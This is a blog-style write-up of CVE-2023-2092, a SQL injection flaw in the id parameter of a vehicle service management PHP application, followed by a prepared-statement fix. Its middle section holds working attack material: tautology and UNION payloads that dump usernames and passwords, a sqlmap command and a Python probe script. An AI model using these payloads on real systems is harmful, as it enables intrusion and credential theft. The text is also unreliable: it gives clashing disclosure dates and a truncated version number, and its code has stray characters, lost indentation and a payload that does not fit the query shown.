In May 2023, a critical security vulnerability was disclosed in the popular open-source project SourceCodester Vehicle Service Management System 1.. This issue, tagged as CVE-2023-2092 and recorded in VulDB as VDB-226100, opens the door for remote attackers to conduct SQL injection attacks. The vulnerability affects the file view_service.php, specifically through improper handling of the id parameter.
In this post, we’ll walk through what SQL injection is, how this particular exploit works, show PoC code, and talk about how you can detect and fix the issue.
What Is the Vulnerability?
The problem boils down to improper sanitization of user input passed via the id parameter in view_service.php. When the application builds SQL queries, it directly uses user-supplied values without filtering or escaping them. This means anyone on the internet can send malicious values to control the database: dumping data, tampering with records, or even deleting information.
In simple terms:
Instead of just showing a service record, a bad actor could force the system to run extra SQL commands.
Version: 1. (and likely earlier, unless patched)
- File: /view_service.php
Input Parameter: id
- CVE: CVE-2023-2092
- VulDB: VDB-226100
When a user visits the page like this
http://yourserver/view_service.php?id=11
The backend takes 11 and likely runs some SQL query such as
$id = $_GET["id"];
$query = "SELECT * FROM services WHERE id = $id";
$result = mysqli_query($conn, $query);
Because $id is NOT sanitized or escaped, you can control the query by changing the id value.
Let’s say you want to see if the application is vulnerable. You might try
http://yourserver/view_service.php?id=1 OR 1=1
Which would build the SQL
SELECT * FROM services WHERE id = 1 OR 1=1
Now, instead of showing just one service, it'll show ALL services! But it gets worse.
Suppose you want to dump another table
http://yourserver/view_service.php?id=1 UNION SELECT 1, username, password FROM users--
Assuming you know the columns and their order, you could expose usernames and passwords.
Let’s automate it with sqlmap, a powerful open-source SQL injection tool
sqlmap -u "http://yourserver/view_service.php?id=1"; --batch --dbs
Enumerate all available databases if vulnerable
You can get sqlmap here:
https://github.com/sqlmapproject/sqlmap
Here’s a quick Python script to check manually
import requests
target_url = 'http://yourserver/view_service.php';
payload = "1' OR '1'='1"
params = {'id': payload}
response = requests.get(target_url, params=params)
if "syntax" not in response.text.lower():
print("Vulnerable to SQL Injection!")
print(response.text)
else:
print("Likely patched or error happened.")
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-2092
- VulDB advisory: https://vuldb.com/?id.226100
- Exploit DB: https://www.exploit-db.com/exploits/51313
- sqlmap tool: https://github.com/sqlmapproject/sqlmap
Always sanitize inputs (use prepared statements or parameterized queries).
- Never trust data coming from GET/POST without checking.
Bad (vulnerable)
$id = $_GET["id"];
$query = "SELECT * FROM services WHERE id = $id";
Good (safe)
$stmt = $conn->prepare("SELECT * FROM services WHERE id = ?");
$stmt->bind_param("i", $_GET["id"]);
$stmt->execute();
Final Thoughts
SQL injection remains one of the most dangerous and easy-to-exploit vulnerabilities in web applications. If you’re running SourceCodester Vehicle Service Management System 1., you MUST fix or isolate this system immediately. Attackers can exploit this bug remotely – it’s only a matter of time.
Check your application and code, patch up, and stay safe!
*If you found this post helpful, share it with your fellow developers & sysadmins to help improve security everywhere!*
Timeline
Published on: 04/15/2023 10:15:00 UTC
Last modified on: 04/24/2023 18:12:00 UTC